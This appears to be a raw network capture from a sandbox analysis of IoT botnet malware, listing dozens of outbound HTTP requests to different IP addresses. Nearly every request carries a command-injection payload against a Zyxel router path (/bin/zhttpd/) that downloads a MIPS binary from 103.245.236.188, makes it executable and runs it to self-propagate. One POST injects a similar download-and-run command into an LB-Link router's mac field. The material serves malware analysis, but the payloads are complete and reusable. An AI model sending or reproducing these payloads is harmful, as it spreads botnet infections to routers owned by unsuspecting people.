                                                Jan 12, 2024 18:24:50.210278034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8191192.168.2.134413889.131.80.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.210338116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8192192.168.2.1352632147.27.66.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.210396051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8193192.168.2.1355310101.54.202.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.210448027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8194192.168.2.134031496.162.222.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.210510969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8195192.168.2.134991879.31.157.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.210561037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8196192.168.2.1348680190.212.83.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.210622072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8197192.168.2.1333570221.79.178.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.210705042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8198192.168.2.1344750199.178.142.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.210736036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8199192.168.2.1351300112.208.128.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.210809946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8200192.168.2.135769627.221.254.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.210856915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8201192.168.2.1343342176.138.206.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:50.212554932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8202192.168.2.133938634.43.68.2478080
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.007514954 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8203192.168.2.133812450.223.178.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.224560022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8204192.168.2.134038039.94.100.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.224594116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8205192.168.2.1339798188.148.167.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.224620104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8206192.168.2.1352292101.130.251.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.224663973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8207192.168.2.1345570146.29.7.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.224692106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8208192.168.2.133445239.163.67.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.224750996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8209192.168.2.1356872223.96.254.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.224787951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8210192.168.2.1335716117.194.158.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.224829912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8211192.168.2.1345584216.15.35.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.224867105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8212192.168.2.1333184100.44.203.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.224890947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8213192.168.2.1351146208.138.178.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.224941969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8214192.168.2.134414845.147.231.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.224987984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8215192.168.2.1357216117.202.26.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225038052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8216192.168.2.1342704175.237.190.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225059986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8217192.168.2.1354058187.212.254.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225128889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8218192.168.2.1356904134.182.183.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225132942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8219192.168.2.1340028134.82.143.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225182056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8220192.168.2.1358750154.21.65.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225208998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8221192.168.2.133898675.127.147.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225261927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8222192.168.2.1355394137.36.253.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225312948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8223192.168.2.1339030105.246.90.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225327969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8224192.168.2.1353240129.0.98.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225389957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8225192.168.2.1343282208.219.142.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225409031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8226192.168.2.1334144219.254.14.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225466013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8227192.168.2.1347478208.20.103.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225490093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8228192.168.2.13423188.243.140.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225518942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8229192.168.2.133463650.219.50.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225554943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8230192.168.2.134194418.198.191.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225565910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8231192.168.2.134393877.39.79.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225594997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8232192.168.2.1345532221.59.54.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225660086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8233192.168.2.1337442222.70.140.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225688934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8234192.168.2.135807037.34.85.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225723028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8235192.168.2.1340956147.22.107.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225775003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8236192.168.2.1337688172.251.132.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225795984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8237192.168.2.1336944187.94.26.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225841999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8238192.168.2.13423622.178.168.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225867033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8239192.168.2.1336368181.211.14.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225900888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8240192.168.2.1357962193.180.28.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.225959063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8241192.168.2.1359210137.10.45.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226006985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8242192.168.2.1347962194.220.228.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226068974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8243192.168.2.1354254221.148.219.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226089954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8244192.168.2.1355180150.128.60.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226116896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8245192.168.2.1336462191.8.189.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226174116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8246192.168.2.134891095.111.96.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226192951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8247192.168.2.1350046211.137.40.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226247072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8248192.168.2.1353170163.172.43.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226294041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8249192.168.2.1344008147.163.191.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226320028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8250192.168.2.134865678.127.191.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:51.226368904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8251192.168.2.135746463.201.158.241443
                                                TimestampBytes transferredDirectionData
